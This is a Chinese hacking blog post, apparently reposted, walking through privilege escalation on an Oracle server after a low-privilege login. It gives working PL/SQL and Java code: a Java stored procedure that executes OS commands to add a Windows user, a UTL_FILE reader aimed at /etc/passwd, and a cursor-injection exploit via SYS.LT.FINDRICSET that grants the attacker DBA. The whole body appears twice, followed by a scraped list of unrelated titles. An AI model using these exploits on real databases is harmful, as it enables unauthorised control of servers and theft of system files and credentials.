连接Oracle服务器后怎么获取权限
来源:互联网 发布:手机qq美化软件 编辑:程序博客网 时间:2024/04/29 09:06
连接上oracle服务器,此时发现:
1.连接后不是dba权限
2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升权限
3.运行SELECT UTL_HTTP.request('http://xxxxxxxxxxx/login.jsp') FROM dual 后发现oracle服务器不能连接网络。
幸运的是,
运行
create or replace function Linx_Query (p varchar2) return number authid current_user is begin execute immediate p; return 1;end;
成功!这个用户具有create proceduce权限。
此时马上想到创建java扩展执行命令:
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+" ";myReader.close();return str;} catch (Exception e){return e.toString();}}}
begin dbms_java.grant_permission('PUBLIC', 'SYS:java.io.FilePermission', '<>', 'execute' );end;
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name 'LinxUtil.runCMD(java.lang.String) return String'
select * from all_objects where object_name like '%LINX%'
grant all on LinxRunCMD to public
select LinxRunCMD('cmd /c net user linx /add') from dual
但是在第一步就卡住了,服务器由于某种未知原因 不能创建java扩展!!
还好,我们还有UTL库可以利用:
create or replace function LinxUTLReadfile (filename varchar2) return varchar2 is
fHandler UTL_FILE.FILE_TYPE;
buf varchar2(4000);
output varchar2(8000);
BEGIN
fHandler := UTL_FILE.FOPEN('UTL_FILE_DIR', filename, 'r');
loop
begin
utl_file.get_line(fHandler,buf);
DBMS_OUTPUT.PUT_LINE('Cursor: 'buf);
exception
when no_data_found then exit;
end;
output := outputbufchr(10);
end loop;
UTL_FILE.FCLOSE(fHandler);
return output;
END;
UTL_FILE_DIR需要先用:
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS '/etc';
指定目。但运行后发现没有权限。只好想办法提权 防黑网。
***************游标注射***************
老外写了N个pdf介绍这技术,我精简了代码:
DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''GRANT DBA TO linxlinx_current_db_user'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: 'MYC);
BEGIN SYS.LT.FINDRICSET('.''dbms_sql.execute( 'MYC' )'''')--','x'); END;
raise NO_DATA_FOUND;
EXCEPTION
WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE('Cursor: 'MYC);
WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('Cursor: 'MYC);
END;
运行后重新连接就有dba权限了,简单吧......
现在可以读取文件了:
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS '/etc';
select LinxUTLReadfile('passwd') from dual
后面就简单了,不写了。
1.连接后不是dba权限
2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升权限
3.运行SELECT UTL_HTTP.request('http://xxxxxxxxxxx/login.jsp') FROM dual 后发现oracle服务器不能连接网络。
幸运的是,
运行
create or replace function Linx_Query (p varchar2) return number authid current_user is begin execute immediate p; return 1;end;
成功!这个用户具有create proceduce权限。
此时马上想到创建java扩展执行命令:
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+" ";myReader.close();return str;} catch (Exception e){return e.toString();}}}
begin dbms_java.grant_permission('PUBLIC', 'SYS:java.io.FilePermission', '<>', 'execute' );end;
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name 'LinxUtil.runCMD(java.lang.String) return String'
select * from all_objects where object_name like '%LINX%'
grant all on LinxRunCMD to public
select LinxRunCMD('cmd /c net user linx /add') from dual
但是在第一步就卡住了,服务器由于某种未知原因 不能创建java扩展!!
还好,我们还有UTL库可以利用:
create or replace function LinxUTLReadfile (filename varchar2) return varchar2 is
fHandler UTL_FILE.FILE_TYPE;
buf varchar2(4000);
output varchar2(8000);
BEGIN
fHandler := UTL_FILE.FOPEN('UTL_FILE_DIR', filename, 'r');
loop
begin
utl_file.get_line(fHandler,buf);
DBMS_OUTPUT.PUT_LINE('Cursor: 'buf);
exception
when no_data_found then exit;
end;
output := outputbufchr(10);
end loop;
UTL_FILE.FCLOSE(fHandler);
return output;
END;
UTL_FILE_DIR需要先用:
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS '/etc';
指定目。但运行后发现没有权限。只好想办法提权 防黑网。
***************游标注射***************
老外写了N个pdf介绍这技术,我精简了代码:
DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''GRANT DBA TO linxlinx_current_db_user'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: 'MYC);
BEGIN SYS.LT.FINDRICSET('.''dbms_sql.execute( 'MYC' )'''')--','x'); END;
raise NO_DATA_FOUND;
EXCEPTION
WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE('Cursor: 'MYC);
WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('Cursor: 'MYC);
END;
运行后重新连接就有dba权限了,简单吧......
现在可以读取文件了:
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS '/etc';
select LinxUTLReadfile('passwd') from dual
后面就简单了,不写了。
- 连接Oracle服务器后怎么获取权限
- 利用oracle反弹SHELL 获取windows服务器权限
- 远程服务器怎么连接
- 服务器更换硬盘后Oracle不能连接问题的解决
- phpstudy 怎么连接oracle
- EclipseSVN断开连接后 怎么重新连接
- oracle连接远程服务器
- oracle连接远程服务器
- oracle sqlplus连接服务器
- oracle 客户端连接服务器
- 远程连接oracle服务器
- ADO 连接 服务器Oracle
- 怎么将我们所在的电脑orcle连接到另外一个oracle服务器
- C#怎么连接Oracle数据库
- jdbc怎么连接oracle数据库?
- Oracle客户端连接Oracle服务器
- oracle client连接oracle服务器
- oracle获取服务器字符集
- 对提高箱琴水平很重要的几张专辑和歌曲
- POJ 1976 A Mini Locomotive (动态规划)
- 安全设置MSSQL的具体步骤
- 安全检测Oracle注入点全过程
- 质量、管理、设计思维的本质是方法论和思考的技术,整理了一份书单列表,欢迎大家参考,尤其是红色字体的经典。学无止境,同志尚需努力!
- 连接Oracle服务器后怎么获取权限
- 手工MSSQL注入常用SQL语句
- ITSM项目实施步骤
- test
- 技术型领导
- POJ2299
- php 随即插入百度关键字(不重复)
- Configure OpenGL on Eclipse with MinGW
- 本人译作《iPhone游戏开发》现已由人民邮电出版社出版发行
